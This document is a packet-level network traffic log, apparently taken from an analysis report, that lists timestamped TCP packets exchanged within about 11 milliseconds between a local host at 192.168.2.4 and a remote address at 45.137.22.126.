Nov 17, 2024 03:07:12.040115118 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040139914 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040160894 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040186882 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040204048 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040230036 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040273905 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040276051 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040302992 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040319920 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040333986 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040344954 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040383101 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040390968 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040416956 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040436983 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040460110 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040465117 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040498018 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040544033 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040546894 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040576935 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040594101 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040625095 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040633917 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040656090 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040677071 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040702105 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040704012 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040760040 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040787935 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040819883 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040842056 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040863037 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040868998 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040919065 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.040942907 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.040997982 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041019917 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041047096 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041074038 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041100025 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041121960 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041148901 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041177034 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041194916 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041202068 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041220903 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041244984 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041268110 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041349888 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041403055 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041405916 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041456938 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041467905 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041495085 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041522026 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041527033 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041555882 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041558981 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041582108 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041606903 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041624069 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041651011 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041676044 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041698933 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041699886 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041731119 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041745901 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041779041 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041779995 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041810036 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041831017 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041857958 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041862011 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041908026 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041924000 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041950941 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.041970968 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041999102 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.041999102 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042031050 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042047977 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042078018 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042088032 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042131901 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042140961 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042167902 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042190075 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042198896 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042212963 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042247057 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042262077 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042296886 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042309046 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042335987 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042361021 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042382002 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042387009 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042407990 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042434931 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042439938 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042460918 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042485952 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042486906 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042538881 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042548895 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042581081 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042606115 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042639017 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042643070 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042692900 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042694092 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042746067 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042923927 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042952061 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.042973042 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.042996883 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043029070 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043077946 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043080091 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043128014 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043145895 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043173075 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043193102 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043221951 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043236971 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043263912 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043287992 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043312073 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043364048 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043390989 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043418884 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043426991 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043442011 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043473959 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043476105 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043524027 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043540955 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043569088 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043592930 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043625116 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043636084 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043663979 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043708086 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043711901 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043742895 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043767929 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043792963 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043797016 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043823957 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043838978 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043867111 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043905020 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043931007 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043955088 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.043962002 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.043977976 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044008970 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044030905 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044071913 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044073105 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044099092 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044126034 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044145107 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044157028 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044172049 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044200897 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044203043 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044226885 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044249058 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044250965 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044280052 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044295073 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044326067 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044332027 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044373035 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044409037 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044435978 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044457912 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044492960 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044501066 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044528008 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044548988 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044574976 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044578075 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044609070 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044626951 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044658899 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044703007 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044729948 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044751883 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044781923 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044867039 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044894934 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044924021 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044943094 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044950008 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.044969082 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.044992924 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045005083 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045021057 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045053005 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045084000 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045097113 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045131922 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045152903 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045191050 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045195103 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045221090 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045245886 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045268059 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045270920 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045299053 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045329094 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045353889 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045375109 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045424938 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045425892 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045473099 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045496941 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045523882 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045545101 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045567036 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045569897 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045599937 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045628071 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045660019 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045664072 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045713902 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045727968 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045772076 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045778036 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045818090 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045820951 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045870066 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045893908 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045943975 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.045954943 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.045999050 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046004057 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046046019 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046053886 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046097994 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046108961 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046134949 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046164036 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046190023 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046216965 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046243906 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046266079 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046289921 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046309948 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046336889 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046356916 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046384096 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046384096 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046415091 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046442032 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046473026 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046494961 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046520948 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046542883 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046552896 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046566010 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046593904 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046602011 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046633005 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046659946 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046694994 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046695948 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046741009 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046747923 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046792030 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046802998 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046857119 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046865940 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046892881 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.046920061 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:12.046936035 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047002077 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047032118 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047065020 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047369003 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047454119 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047580004 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047624111 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047668934 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047736883 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047821045 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047847033 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047895908 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047923088 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047970057 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.047996998 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048027039 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048053026 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048110008 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048140049 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048217058 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048254967 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048300028 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048413038 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048679113 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.048851967 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049138069 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049212933 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049455881 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049587011 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049596071 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049690962 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049700022 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049798012 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.049968958 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050142050 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050206900 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050322056 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050420046 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050435066 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050494909 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050753117 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050762892 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050868034 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050877094 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.050915956 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051021099 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051035881 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051100016 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051245928 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051534891 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051635027 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051651001 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:12.051702023 CET	55615	49737	45.137.22.126	192.168.2.4
